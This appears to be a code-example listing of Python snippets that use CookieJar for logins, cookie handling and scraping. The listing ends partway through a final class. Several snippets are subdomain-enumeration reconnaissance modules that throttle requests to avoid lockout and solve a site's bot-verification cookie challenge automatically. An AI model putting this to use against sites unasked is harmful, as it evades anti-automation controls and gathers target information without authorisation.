Example #1
def get_opener():
    global OPENER
    if OPENER:
        return OPENER
    cj = CookieJar()
    ck = Cookie(
        version=0,
        name="Locale",
        value="Russian",
        port=None,
        port_specified=False,
        domain="acm.timus.ru",
        domain_specified=False,
        domain_initial_dot=False,
        path="/",
        path_specified=True,
        secure=False,
        expires=None,
        discard=True,
        comment=None,
        comment_url=None,
        rest={"HttpOnly": None},
        rfc2109=False,
    )
    cj.set_cookie(ck)
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    data = urllib.urlencode({"Action": "edit", "JudgeID": JUDGE_ID, "Password": PASSWORD})
    response = opener.open(AUTH_URL, data)
    OPENER = opener
    return opener
Example #2
def _doPOST(action=None, extra_headers=None, args=None, url=API_URL, host=HOST):
    body = ACTION_REQUEST_MAPPING.get(action, None)
    if not body:
        print "Unable to find the request data for the action %s" %action
        sys.exit(1)
    body = body % args
    
    headers = {
        'Host': host,
        'Accept-Encoding': 'deflate',
        'Content-Length': len(body),
        'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)',
    }
    if extra_headers:
        headers.update(extra_headers)
    
    request = urllib2.Request(url, body, headers)
    try:
        response = urllib2.urlopen(request)
        cookies = CookieJar()
        cookies.extract_cookies(response, request)
        cookie_handler= urllib2.HTTPCookieProcessor( cookies )
        redirect_handler= urllib2.HTTPRedirectHandler()
        opener = urllib2.build_opener(redirect_handler, cookie_handler)
        resp = opener.open(request)
        return resp.read()
    except urllib2.HTTPError, e:
        print >> sys.stderr, "National Rail servers having some trouble - ", e
        raise e
Example #3
def _doPOST(POST_DATA=LOGIN_POST_DATA, extra_headers=META_HEADERS, args=None, url=LOGIN_URL, cookies=None):
    """
    Method to login to sky
    """
    body = ''
    if POST_DATA:
        body = '&'.join([k+'='+v for k,v in POST_DATA.items()]) % args
    
    headers={
        'Accept-Encoding' : 'deflate',
        'Content-Length' : len(body),
    }
    if extra_headers:
        headers.update(extra_headers)
    
    request = urllib2.Request(url, body, headers)
    try:
        response = urllib2.urlopen(request)
        if not cookies:
            cookies = CookieJar()
            cookies.extract_cookies(response, request)
        cookie_handler= urllib2.HTTPCookieProcessor(cookies)
        redirect_handler= urllib2.HTTPRedirectHandler()
        opener = urllib2.build_opener(redirect_handler, cookie_handler)
        resp = opener.open(request)
        return cookies, resp.read()
    except urllib2.HTTPError, e:
        print >> sys.stderr, "Sky servers having some trouble - ", e
        raise e
Example #4
    def extract_cookiejar(self):
        """
        Extract cookies that pycurl instance knows.

        Returns `CookieJar` object.
        """

        # Example of line:
        # www.google.com\tFALSE\t/accounts/\tFALSE\t0\tGoogleAccountsLocale_session\ten
        # Fields:
        # * domain
        # * whether or not all machines under that domain can read the cookie's information.
        # * path
        # * Secure Flag: whether or not a secure connection (HTTPS) is required to read the cookie.
        # * exp. timestamp
        # * name
        # * value
        cookiejar = CookieJar()
        for line in self.curl.getinfo(pycurl.INFO_COOKIELIST):
            values = line.split('\t')
            # old
            #cookies[values[-2]] = values[-1]
            # new
            cookie = create_cookie(
                name=values[5],
                value=values[6],
                domain=values[0],
                path=values[2],
                secure=values[3] == "TRUE",
                expires=int(values[4]) if values[4] else None,
            )
            cookiejar.set_cookie(cookie)
        return cookiejar
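Note: create_cookie above is a helper from the surrounding library and is not shown in this listing. A minimal sketch of what such a helper might look like, modeled on the explicit cookielib.Cookie constructions in Example #1 and Example #5 (the defaults below are assumptions, not the library's actual behavior):

from cookielib import Cookie

def create_cookie(name, value, domain='', path='/', secure=False, expires=None):
    # Build a cookielib.Cookie with permissive defaults; mirrors the keyword
    # arguments used explicitly in Example #1 and Example #5.
    return Cookie(
        version=0, name=name, value=value,
        port=None, port_specified=False,
        domain=domain, domain_specified=bool(domain),
        domain_initial_dot=domain.startswith('.'),
        path=path, path_specified=bool(path),
        secure=secure, expires=expires,
        discard=expires is None,
        comment=None, comment_url=None,
        rest={}, rfc2109=False,
    )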
Example #5
    def test_cookie_store(self):
        cj = CookieJar()
        test_email = "*****@*****.**"
        test_cookies = [Cookie(version=0, name='Name', value='1',
                               port=None, port_specified=False,
                               domain='www.example.com',
                               domain_specified=False,
                               domain_initial_dot=False,
                               path='/', path_specified=True, secure=False,
                               expires=None,
                               discard=True, comment=None, comment_url=None,
                               rest={'HttpOnly': None},
                               rfc2109=False)]
        for c in test_cookies:
            cj.set_cookie(c)
        x = Credentials(id=test_email)
        cookie_list = [c for c in cj]
        x.cookies = cookie_list
        x.put()

        y = Credentials.get_by_id(test_email)
        self.assertIsNotNone(y)
        self.assertEquals(y.key.id(), test_email)
        stored_credentials_dict = [sc.__dict__ for sc in y.cookies]
        self.assertEquals(stored_credentials_dict,
                          [sc.__dict__ for sc in test_cookies])
Example #6
 def module_run(self, domains):
     base_url = 'https://www.bing.com/search'
     cnt = 0
     new = 0
     for domain in domains:
         self.heading(domain, level=0)
         base_query = 'domain:' + domain
         pattern = '"b_algo"><h2><a href="(?:\w*://)*(\S+?)\.%s[^"]*"' % (domain)
         subs = []
         # control variables
         new = True
         page = 0
         nr = 50
         cookiejar = CookieJar()
         cookiejar.set_cookie(self.make_cookie('SRCHHPGUSR', 'NEWWND=0&NRSLT=%d&SRCHLANG=&AS=1' % (nr), '.bing.com'))
         # execute search engine queries and scrape results storing subdomains in a list
         # loop until no new subdomains are found
         while new == True:
             content = None
             query = ''
             # build query based on results of previous results
             for sub in subs:
                 query += ' -domain:%s.%s' % (sub, domain)
             full_query = base_query + query
             url = '%s?first=%d&q=%s' % (base_url, (page*nr), urllib.quote_plus(full_query))
             # bing errors out at > 2059 characters not including the protocol
             if len(url) > 2066: url = url[:2066]
             self.verbose('URL: %s' % (url))
             # send query to search engine
             resp = self.request(url, cookiejar=cookiejar)
             if resp.status_code != 200:
                 self.alert('Bing has encountered an error. Please submit an issue for debugging.')
                 break
             content = resp.text
             sites = re.findall(pattern, content)
             # create a unique list
             sites = list(set(sites))
             new = False
             # add subdomain to list if not already exists
             for site in sites:
                 if site not in subs:
                     subs.append(site)
                     new = True
                     host = '%s.%s' % (site, domain)
                     self.output('%s' % (host))
                     new += self.add_hosts(host)
             if not new:
                 # exit if all subdomains have been found
                 if not '>Next</a>' in content:
                     break
                 else:
                     page += 1
                     self.verbose('No New Subdomains Found on the Current Page. Jumping to Result %d.' % ((page*nr)+1))
                     new = True
             # sleep script to avoid lock-out
             self.verbose('Sleeping to avoid lockout...')
             time.sleep(random.randint(5,15))
         cnt += len(subs)
     self.summarize(new, cnt)
Example #7
    def cookiejar(self):
        cookiejar = CookieJar()
        for domain, items in self._cookie.items():
            for path, names in items.items():
                for name, cookie in names.items():
                    cookiejar.set_cookie(cookie)

        return cookiejar
Example #8
 def clear(self, domain=None, path=None, name=None):
   if issubclass(CookieJar, object):
     super(KeyringCookieJar, self).clear(domain, path, name)
   else:
     # old-style class in Python 2
     CookieJar.clear(self, domain, path, name)
   self.nuke()
   self.save()
Example #9
  def __init__(self, svc=DEFAULT_SERVICE, acct=None,
      delayload=False, policy=None):

    CookieJar.__init__(self, policy)
    self.svc = "Cookies for " + svc
    self.acct = getpass.getuser() if acct is None else acct
    self.delayload = bool(delayload)

    if not self.delayload: self.load()
Example #10
    def __init__(self, token=None):
        CookieJar.__init__(self)

        if token:
            parts = token.split("_")
            if len(parts) == 2:
                crowd, stat = parts
                self.make_cookie(self.CROWD_COOKIE, crowd)
                self.make_cookie(self.STAT_COOKIE, stat)
Example #11
def extract_request_cookies(req):
    jar = CookieJar()
    host = urlparse.urlsplit(req.host_url).hostname
    for k, v in req.str_cookies.iteritems():
        yield jar._cookie_from_cookie_tuple(
            (k, v,
             {"domain": host,
              "path": "/"},
             {}), None)
Example #12
class Browser(object):
    def __init__(self, base_url):
        self.cookie_jar = CookieJar()
        self.opener = build_opener(HTTPCookieProcessor(self.cookie_jar))
        self.base_url = base_url

    def open(self, url, **kwargs):
        _raw = kwargs.pop('_raw', False)
        _is_json = kwargs.pop('_is_json', True)
        url = urljoin(self.base_url, url)
        data = urlencode(kwargs).encode()
        headers = {
            u"Content-Type" : u"application/x-www-form-urlencoded",
        }

        req = Request(url, data, headers)
        res = self.opener.open(req)

        with closing(res) as fp:
            content = fp.read()

        content = content.decode()

        if not _raw:
            content = json.loads(content)

        return res, content

    def set_cookie(self, name, value):
        url = urlparse(self.base_url)
        cookie = Cookie(
            version=0,
            name=name,
            value=value,
            port=None,
            port_specified=False,
            domain=url.netloc,
            domain_specified=False,
            domain_initial_dot=False,
            path=url.path,
            path_specified=True,
            secure=False,
            expires=sys.maxsize,
            discard=False,
            comment=None,
            comment_url=None,
            rest={},
            rfc2109=False,
        )

        self.cookie_jar.set_cookie(cookie)

    def __getitem__(self, url):
        return functools.partial(self.open, url)
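A hypothetical usage of the Browser class above (the base URL, endpoint, and form fields are placeholders; the server is assumed to answer with JSON unless _raw=True is passed):

browser = Browser("http://localhost:8000/")
browser.set_cookie("session", "abc123")
# open() always POSTs its keyword arguments as an urlencoded form body.
res, payload = browser.open("/api/login", username="alice", password="secret")
# __getitem__ binds an endpoint for repeated calls:
login = browser["/api/login"]
res, payload = login(username="alice", password="secret")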
Example #13
 def __init__(self, cookiestring='', policy=None):
     CookieJar.__init__(self, policy)
     self.cookiestring = cookiestring
     if not cookiestring:
         return
     f = StringIO.StringIO(cookiestring)
     try:
         self._really_load(f, '[No file. Content loaded from string]', False, False)
     finally:
         f.close()
Example #14
 def cookies(self):
     jar = CookieJar()
     if self.settings:
         jar.set_cookie(Cookie(
             version=0, name='settings',
             value=urllib.quote(phpserialize.serialize(self.settings)),
             port=None, port_specified=False, domain='mediapoisk.info',
             domain_specified=True, domain_initial_dot=True, path='/', path_specified=True, secure=False,
             expires=None, discard=True, comment=None, comment_url=None, rest=None, rfc2109=True
             ))
     return jar
Example #15
    def test_cookiejar(self):
        c1 = create_cookie('foo', 'bar')
        c2 = create_cookie('foo', 'bar')
        self.assertFalse(c1 == c2)

        c = create_cookie('foo', 'bar', domain='.dumpz.org')
        self.assertEquals(c.domain, '.dumpz.org')

        cj = CookieJar()
        cj.set_cookie(create_cookie('foo', 'bar', domain='foo.com'))
        cj.set_cookie(create_cookie('foo', 'bar', domain='bar.com'))
        self.assertEqual(len(cj), 2)
Example #16
def request(url, data=None, headers={}, cookies={}, auth=None):
 if cookies:
  headers['Cookie'] = '; '.join(urllib.quote(k) + '=' + urllib.quote(v) for (k, v) in cookies.iteritems())
 request = urllib2.Request(url.encode('utf8'), data, headers)
 manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
 if auth:
  manager.add_password(None, request.get_full_url(), auth[0], auth[1])
 opener = urllib2.build_opener(urllib2.HTTPBasicAuthHandler(manager), urllib2.HTTPDigestAuthHandler(manager))
 response = opener.open(request)
 cj = CookieJar()
 cj.extract_cookies(response, request)
 return HttpResponse(response.read(), response.info().headers, dict((c.name, c.value) for c in cj))
Example #17
    def __init__(self, cookieStr=None, delayload=True, policy=None):
        """
        Cookies are NOT loaded from the named file until either the .load() or
        .revert() method is called.

        """
        CookieJar.__init__(self, policy)
        if cookieStr is not None:
            try:
                cookieStr + ""  # duck-type check: must be string-like
            except TypeError:
                raise ValueError("cookieStr must be string-like")
            self.load(cookieStr)
Example #18
def getCurrentUsage(username, password):
    url = "https://cyberstore.tpg.com.au/your_account/index.php?function=checkaccountusage"

    data = {}
    values = {'check_username': username, 'password': password}

    data = urllib.urlencode(values)
    request = urllib2.Request(url, data)

    try:
        response = urllib2.urlopen(request)
    except:
        print("ERROR: Could not retrieve TPG website...");
        raise

    cookies = CookieJar()
    cookies.extract_cookies(response, request)
    cookie_handler = urllib2.HTTPCookieProcessor(cookies)
    redirect_handler = urllib2.HTTPRedirectHandler()
    opener = urllib2.build_opener(redirect_handler,cookie_handler)

    try:
        response = opener.open(request)
    except:
        print("ERROR: Could not retrieve account usage website...");
        raise

    the_page = response.read()


    # For accounts that count upload and download
    found = re.search('(<BR>Peak\ Downloads\ used:\ )(.+)( MBPeak\ Uploads\ used:\ )(.+)( MBPeak Total used: )(.+)( MB<br>Off-Peak Downloads used: )(.+)( MB<br>Off-Peak Uploads used: )(.+)( MBOff-Peak Total used: )(.+)( MB</td>)', the_page)
    if found:
        onpeak_downloads_used = found.group(2)
        onpeak_uploads_used = found.group(4)
        onpeak_used = found.group(6)
        offpeak_downloads_used = found.group(8)
        offpeak_uploads_used = found.group(10)
        offpeak_used = found.group(12)
        return float(onpeak_used), float(offpeak_used)

    # For accounts that only count download
    found = re.search('(<BR>Peak\ Downloads\ used:\ )(.+)( MB<br>Off-Peak Downloads used: )(.+)( MB</td>)', the_page)
    if found:
        onpeak_used = found.group(2)
        offpeak_used = found.group(4)
        return float(onpeak_used), float(offpeak_used)

    print("ERROR: Could not find quota information in returned site. Check login details.");
    #print(the_page)
    raise
Example #19
 def module_run(self, domains):
     url = 'http://searchdns.netcraft.com/'
     pattern = '<td align\=\"left\">\s*<a href=\"http://(.*?)/"'
     # answer challenge cookie
     cookiejar = CookieJar()
     payload = {'restriction': 'site+ends+with', 'host': 'test.com'}
     resp = self.request(url, payload=payload, cookiejar=cookiejar)
     cookiejar = resp.cookiejar
     for cookie in cookiejar:
         if cookie.name == 'netcraft_js_verification_challenge':
             challenge = cookie.value
             response = hashlib.sha1(urllib.unquote(challenge)).hexdigest()
             cookiejar.set_cookie(self.make_cookie('netcraft_js_verification_response', '%s' % response, '.netcraft.com'))
             break
     cnt = 0
     new = 0
     for domain in domains:
         self.heading(domain, level=0)
         payload['host'] = domain
         subs = []
         # execute search engine queries and scrape results storing subdomains in a list
         # loop until no Next Page is available
         while True:
             self.verbose('URL: %s?%s' % (url, urllib.urlencode(payload)))
             resp = self.request(url, payload=payload, cookiejar=cookiejar)
             content = resp.text
             sites = re.findall(pattern, content)
             # create a unique list
             sites = list(set(sites))
             # add subdomain to list if not already exists
             for site in sites:
                 if site not in subs:
                     subs.append(site)
                     self.output('%s' % (site))
                     new += self.add_hosts(site)
             # verifies if there's more pages to look while grabbing the correct 
             # values for our payload...
             link = re.findall(r'(\blast\=\b|\bfrom\=\b)(.*?)&', content)
             if not link:
                 break
             else:
                 payload['last'] = link[0][1]
                 payload['from'] = link[1][1]
                 self.verbose('Next page available! Requesting again...' )
                 # sleep script to avoid lock-out
                 self.verbose('Sleeping to Avoid Lock-out...')
                 time.sleep(random.randint(5,15))
         cnt += len(subs)
     self.summarize(new, cnt)
Example #20
 def module_run(self, domains):
     url = "http://searchdns.netcraft.com/"
     pattern = '<td align\="left">\s*<a href="http://(.*?)/"'
     # answer challenge cookie
     cookiejar = CookieJar()
     payload = {"restriction": "site+ends+with", "host": "test.com"}
     resp = self.request(url, payload=payload, cookiejar=cookiejar)
     cookiejar = resp.cookiejar
     for cookie in cookiejar:
         if cookie.name == "netcraft_js_verification_challenge":
             challenge = cookie.value
             response = hashlib.sha1(urllib.unquote(challenge)).hexdigest()
             cookiejar.set_cookie(
                 self.make_cookie("netcraft_js_verification_response", "%s" % response, ".netcraft.com")
             )
             break
     for domain in domains:
         self.heading(domain, level=0)
         payload["host"] = domain
         subs = []
         # execute search engine queries and scrape results storing subdomains in a list
         # loop until no Next Page is available
         while True:
             self.verbose("URL: %s?%s" % (url, encode_payload(payload)))
             resp = self.request(url, payload=payload, cookiejar=cookiejar)
             content = resp.text
             sites = re.findall(pattern, content)
             # create a unique list
             sites = list(set(sites))
             # add subdomain to list if not already exists
             for site in sites:
                 if site not in subs:
                     subs.append(site)
                     self.output("%s" % (site))
                     self.add_hosts(site)
             # verifies if there's more pages to look while grabbing the correct
             # values for our payload...
             link = re.findall(r"(\blast\=\b|\bfrom\=\b)(.*?)&", content)
             if not link:
                 break
             else:
                 payload["last"] = link[0][1]
                 payload["from"] = link[1][1]
                 self.verbose("Next page available! Requesting again...")
                 # sleep script to avoid lock-out
                 self.verbose("Sleeping to Avoid Lock-out...")
                 time.sleep(random.randint(5, 15))
         if not subs:
             self.output("No results found.")
Example #21
def get_country_index():
    for country in range(1,999):
        jar = CookieJar()
        req = Request(URL_SEARCH, urlencode({'country': country}))
        res = urlopen(req)
        jar.extract_cookies(res, req)
        for page in count(1):
            req = Request(URL % (country, page))
            jar.add_cookie_header(req)
            doc = html.parse(urlopen(req))
            anchors = list(doc.findall('//table[@id="searchResultsTable"]/tbody//a'))
            for a in anchors:
                get_entry(urljoin(URL, a.get('href')))
            if doc.find('//span[@class="pagelinks"]/a/img[@alt="Next"]') is None:
                break
Example #22
def test_cookielib_compatibility():
    cj = CookieJar()
    # Set time in order to be still valid in some years, when cookie strings expire
    cj._now = cj._policy._now = time.mktime((2012, 1, 1, 0, 0, 0, 0, 0, 0))

    request = Request('http://test.com')
    parser = HTTPResponse()
    parser.feed(MULTI_COOKIE_RESPONSE)
    cookies = cj.make_cookies(parser, request)
    # Don't use extract_cookies directly, as time can not be set there manually for testing
    for cookie in cookies:
        if cj._policy.set_ok(cookie, request):
            cj.set_cookie(cookie)
    # Three valid, not expired cookies placed
    assert len(list(cj)) == 3
Example #23
def get_cookies_from_response(url):
    cookiejar = CookieJar()

    opener = urllib2.build_opener(
        urllib2.HTTPCookieProcessor(cookiejar))
    opener.open(url)

    # add a new cookie (or replace an existing one with the same name)
    newcookie = make_cookie('newcookie', '11111', '.baidu.com', '/')
    cookiejar.set_cookie(newcookie)

    # remove the cookie again
    cookiejar.clear('.baidu.com', '/', 'newcookie')

    return cookiejar
Example #24
class Wypok(object):
    def __init__(self, cookies):
        self.cj = CookieJar()
        for i in json.loads(cookies):
            c = Cookie(
                None,
                i["name"],
                i["value"],
                "80",
                "80",
                i["domain"],
                None,
                None,
                i["path"],
                None,
                i["secure"],
                time() + (60 * 60 * 60 * 24 * 365),
                "TestCookie",
                None,
                None,
                None,
            )
            self.cj.set_cookie(c)

    def get(self, url):
        r = requests.get(url, cookies=self.cj)
        return r.content

    def entries(self, url):

        ht = self.get(url)
        soup = BeautifulSoup(ht, "html.parser")
        ret = []
        for i in soup.find_all("li", class_=re.compile("link")):
            t = i.find("h2").text.strip()
            link = i.find("h2").find("a").get("href")
            desc = i.find("p", class_="text").text.strip()
            tags = []
            for j in i.find_all("a", class_="tag"):
                if "unhide" not in j.attrs["class"]:
                    tags.append(j.text.strip().lstrip("#"))

            wykopUrl = i.find("div", class_="diggbox").find("a").get("href")

            if not "partner" in wykopUrl and ("voteUp" in wykopUrl or "voteRemove" in wykopUrl):
                ret.append(Znalezisko(t, desc, link, wykopUrl, tags, handle=self))

        return ret
Example #25
	def __init__(self, base, user = None, password = None, forget = False,
			skip_auth = False, httpuser = None, httppassword = None ):
		"""
		{user} and {password} will be prompted if an action needs them
		and they are not supplied.

		if {forget} is set, the login cookie will be destroyed on quit.

		@param base: base url of the bugzilla
		@type  base: string
		@keyword user: username for authenticated actions.
		@type    user: string
		@keyword password: password for authenticated actions.
		@type    password: string
		@keyword forget: forget login session after termination.
		@type    forget: bool
		@keyword skip_auth: do not authenticate
		@type    skip_auth: bool
		"""
		self.base = base
		scheme, self.host, self.path, query, frag  = urlsplit(self.base)
		self.authenticated = False
		self.forget = forget

		if not self.forget:
			try:
				cookie_file = os.path.join(os.environ['HOME'], COOKIE_FILE)
				self.cookiejar = LWPCookieJar(cookie_file)
				if forget:
					try:
						self.cookiejar.load()
						self.cookiejar.clear()
						self.cookiejar.save()
						os.chmod(self.cookiejar.filename, 0700)
					except IOError:
						pass
			except KeyError:
				self.warn('Unable to save session cookies in %s' % COOKIE_FILE)
				self.cookiejar = CookieJar()
		else:
			self.cookiejar = CookieJar()

		self.opener = build_opener(HTTPCookieProcessor(self.cookiejar))
		self.user = user
		self.password = password
		self.httpuser = httpuser
		self.httppassword = httppassword
		self.skip_auth = skip_auth
Example #26
def qq_friends(request):
    for k in request.POST:
        print '%s : %s' % (k, request.POST[k])
    verifysession = request.COOKIES['verifysession']
    print verifysession
    headers = {'Cookie':'''verifysession=%s''' % verifysession,
               'Content-Type':'application/x-www-form-urlencoded',
               'Referer':'http://mail.qq.com/',
               'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1',
               }
    data = urlencode(request.POST)
    login_request = Request('http://%s.mail.qq.com/cgi-bin/login?sid=0,2,zh_CN' % server_no, data, headers)
    result = urlopen(login_request)
    content = result.read()
    login_error = login_error_re.search(content)
    if login_error:
        error_no = login_error.group(1) #1:password wrong 2: captcha wrong
        if error_no == '1':
            error_msg = 'password or qq wrong'
        elif error_no == '2':
            error_msg = 'captcha wrong'
        return render_to_response('friends.html', locals())
    sid = login_succ_re.search(content).group(1)
        
    friends_list_headers = {'Referer':'http://mail.qq.com/',
                           'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1',
                           }
    friends_list_request = Request('http://%s.mail.qq.com/cgi-bin/addr_listall?sid=%s&sorttype=null&category=common' % (server_no, sid), headers = friends_list_headers)
    cj = CookieJar()
    cj.extract_cookies(result, friends_list_request)
    opener = build_opener(HTTPCookieProcessor(cj))
    result = opener.open(friends_list_request)
    grouplist = hacked_friendlist_page_re.search(result.read().decode('gb2312', 'ignore')).group(0)
    soup = BeautifulSoup(grouplist, fromEncoding = 'utf-8')
    grouplist = soup.findAll('li')
    friend_list = {}
    for group in grouplist:
        friend_list[group.a.string] = []
        list_request = Request('http://%s.mail.qq.com%s' % (server_no, group.a['href']), headers = friends_list_headers)
        result = opener.open(list_request)
        body = BeautifulSoup(body_re.search(result.read().decode('gb2312', 'ignore')).group(0), fromEncoding = 'utf-8')
        friends = body.findAll('div', attrs={'class':'M'})
        for friend in friends:
            friend_name = unescape(friend.p.span.contents[1].replace('&nbsp;', '', 1))
            friend_email = friend.p.img['addr']
            friend_list[group.a.string].append((friend_name, friend_email))
    
    return render_to_response('friends.html', locals())
Example #27
def request(url, data=None, headers={}, cookies={}, auth=None, returnHeaders=False):
 cookieHeader = cookieencode(cookies)
 if cookieHeader:
  headers['Cookie'] = cookieHeader
 request = urllib2.Request(url, data, headers)
 manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
 if auth:
  manager.add_password(None, request.get_full_url(), auth[0], auth[1])
 opener = urllib2.build_opener(urllib2.HTTPBasicAuthHandler(manager), urllib2.HTTPDigestAuthHandler(manager))
 response = opener.open(request)
 if returnHeaders:
  cj = CookieJar()
  cj.extract_cookies(response, request)
  return response.read(), response.info().headers, dict((c.name, c.value) for c in cj)
 else:
  return response.read()
Example #28
    def __init__(self, username=None, password=None,
                 debug=False, naptime=True,
                 user_agent=DEFAULT_USER_AGENT):
        self.sleep_after_request = naptime
        self.user_agent = user_agent
        self.debug = debug

        # Try setting the username from args
        self.username = username
        self.password = password
        self.logged_in = False

        self.cookie_jar = CookieJar()
        if self.debug:
            # Noisy HTTPS handler for debugging
            self.url_opener = build_opener(
                HTTPCookieProcessor(self.cookie_jar),
                HTTPSHandler(debuglevel=1))
        else:
            self.url_opener = build_opener(
                HTTPCookieProcessor(self.cookie_jar))

        self.url_opener.addheaders = [
            ('User-Agent', self.user_agent)
        ]

        logging.info('Downloader initialized.')
Example #29
 def __init__(self):
     '''
     Constructor. It delegates construction to the base class
     L{HttxObject} and initializes the member variables
     '''
     HttxObject.__init__(self)
     self.cookiejar = CookieJar()
Example #30
 def __read_cj(self):
     MAX_EPS = 86400 #24 hours
     if os.path.exists("cookiejar.dat"):
         modtime = os.stat("cookiejar.dat").st_mtime
         if time.time() - modtime > MAX_EPS:
             return None
         else:
             dd = pickle.load(open("cookiejar.dat", "r"))
             cj =  CookieJar()
             for c in dd["cookies"]:
                 cj.set_cookie(c)
             self.__uid = dd["uid"]
             self.__nickname = dd["nick"]
             return cj
     else:
         return None
Example #31
 def get_fresh(self):
     cook = CookieJar()
     agnt = CookieAgent(Agent(reactor), cook)
     return cook, agnt
Example #32
    def __init__(self, name=None, project=None, lang=None, base_url=None,
                 article_path=None, script_path=None, sql=None,
                 namespaces=None, login=(None, None), cookiejar=None,
                 user_agent=None, use_https=False, assert_edit=None,
                 maxlag=None, wait_between_queries=2, logger=None,
                 search_config=None):
        """Constructor for new Site instances.

        This probably isn't necessary to call yourself unless you're building a
        Site that's not in your config and you don't want to add it - normally
        all you need is wiki.get_site(name), which creates the Site for you
        based on your config file and the sites database. We accept a bunch of
        kwargs, but the only ones you really "need" are *base_url* and
        *script_path*; this is enough to figure out an API url. *login*, a
        tuple of (username, password), is highly recommended. *cookiejar* will
        be used to store cookies, and we'll use a normal CookieJar if none is
        given.

        First, we'll store the given arguments as attributes, then set up our
        URL opener. We'll load any of the attributes that weren't given from
        the API, and then log in if a username/pass was given and we aren't
        already logged in.
        """
        # Attributes referring to site information, filled in by an API query
        # if they are missing (and an API url can be determined):
        self._name = name
        self._project = project
        self._lang = lang
        self._base_url = base_url
        self._article_path = article_path
        self._script_path = script_path
        self._namespaces = namespaces

        # Attributes used for API queries:
        self._use_https = use_https
        self._assert_edit = assert_edit
        self._maxlag = maxlag
        self._wait_between_queries = wait_between_queries
        self._max_retries = 6
        self._last_query_time = 0
        self._api_lock = Lock()
        self._api_info_cache = {"maxlag": 0, "lastcheck": 0}

        # Attributes used for SQL queries:
        if sql:
            self._sql_data = sql
        else:
            self._sql_data = {}
        self._sql_conn = None
        self._sql_lock = Lock()
        self._sql_info_cache = {"replag": 0, "lastcheck": 0, "usable": None}

        # Attribute used in copyright violation checks (see CopyrightMixIn):
        if search_config:
            self._search_config = search_config
        else:
            self._search_config = {}

        # Set up cookiejar and URL opener for making API queries:
        if cookiejar is not None:
            self._cookiejar = cookiejar
        else:
            self._cookiejar = CookieJar()
        if not user_agent:
            user_agent = constants.USER_AGENT  # Set default UA
        self._opener = build_opener(HTTPCookieProcessor(self._cookiejar))
        self._opener.addheaders = [("User-Agent", user_agent),
                                   ("Accept-Encoding", "gzip")]

        # Set up our internal logger:
        if logger:
            self._logger = logger
        else:  # Just set up a null logger to eat up our messages:
            self._logger = getLogger("earwigbot.wiki")
            self._logger.addHandler(NullHandler())

        # Get all of the above attributes that were not specified as arguments:
        self._load_attributes()

        # If we have a name/pass and the API says we're not logged in, log in:
        self._login_info = name, password = login
        if name and password:
            logged_in_as = self._get_username_from_cookies()
            if not logged_in_as or name.replace("_", " ") != logged_in_as:
                self._login(login)
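A hypothetical construction call for the Site class above, with a placeholder wiki URL and credentials; it assumes the class and its package-level dependencies (constants.USER_AGENT, the earwigbot.wiki logger) are importable. As the docstring notes, wiki.get_site(name) is normally used instead:

from cookielib import CookieJar

# base_url + script_path are enough for the constructor to work out the API URL;
# the login tuple and cookiejar are optional (a plain CookieJar is the default).
site = Site(base_url="https://en.wikipedia.org", script_path="/w",
            login=("ExampleBot", "example-password"),
            cookiejar=CookieJar())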
Example #33
#!/usr/bin/python

import urllib
import urllib2
import re
from cookielib import CookieJar
import sys

cj = CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))


def main():
    _, username, password = sys.argv
    fd1 = opener.open("http://www.google.com")
    metaLine = [l for l in fd1 if '<META HTTP-EQUIV="Refresh"' in l][0]
    if "login.tikona.in" not in metaLine:
        return
    url1 = metaLine[metaLine.index('URL=') + 4:-3]
    print "Step #1: Done"
    fd2 = opener.open(url1)
    #print fd2.read()
    url2 = opener.open(
        urllib2.Request(
            "https://login.tikona.in/userportal/" +
            "login.do?requesturi=http%3A%2F%2Fwww.google.com%2F&act=null", ""))
    print "Step #2: Done"
    #print url2.read()
    url2 = opener.open(
        urllib2.Request(
            "https://login.tikona.in/userportal/newlogin.do?phone=0",
Example #34
def module_exists(module_name):
    # Probe used below to detect whether a user-supplied config module exists.
    try:
        __import__(module_name)
    except ImportError:
        return False
    else:
        return True


# Import user created settings. This will override built-in settings if defined.
if module_exists("config"):
    import config
else:
    print(
        "Please set up the config.py file. Copy 'sample.config.py' to 'config.py' and set up options"
    )
    sys.exit(2)

# Initialize cookie jar and session
cookies = CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookies))

print("Load login page")

### Load the login page. This will initialize some cookies. Save them.
login_page = opener.open(
    'https://disneyworld.disney.go.com/login/?returnUrl=https://mydisneyphotopass.disney.go.com/'
)
# cookies are automatically saved.

# grab the unique CSRF key. parse it.
csrf_key = re.search('id="pep_csrf" value=".*"', login_page.read())
csrf_key = csrf_key.group(0)
csrf_key = string.split(csrf_key, "\"")  # split on double quote. easiest way.
csrf_key = csrf_key[
Example #35
class Network(DOMMixin):

    capabilities = [
        'cookies',
        'headers',
        ]

    wait_expression = WaitExpression

    user_agent = {
        'browser': 'network',
        'platform': 'python',
        'version': '1.0',
        }

    def __init__(self, base_url=None):
        # accept additional request headers?  (e.g. user agent)
        self._base_url = base_url
        self.reset()

    def open(self, url, wait_for=None, timeout=0):
        """Open web page at *url*."""
        self._open(url)

    def reset(self):
        self._referrer = None
        self._request_environ = None
        self._cookie_jar = CookieJar()
        self._opener = urllib2.build_opener(
            urllib2.HTTPCookieProcessor(self._cookie_jar)
        )
        self.status_code = 0
        self.status = ''
        self.response = None
        self.location = None
        self.headers = ()

    def wait_for(self, condition, timeout=None):
        pass

    def sync_document(self):
        """The document is always synced."""

    _sync_document = DOMMixin.sync_document

    @property
    def cookies(self):
        if not (self._cookie_jar and self.location):
            return {}
        request = urllib2.Request(self.location)
        policy = self._cookie_jar._policy

        # policy.return_ok will only return a cookie if the following attrs are
        # set correctly: "version", "verifiability", "secure", "expires",
        # "port", "domain"
        return dict((c.name, c.value.strip('"'))
            for c in self._cookie_jar if policy.return_ok(c, request))

    def set_cookie(self, name, value, domain=None, path=None,
                   session=True, expires=None, port=None):
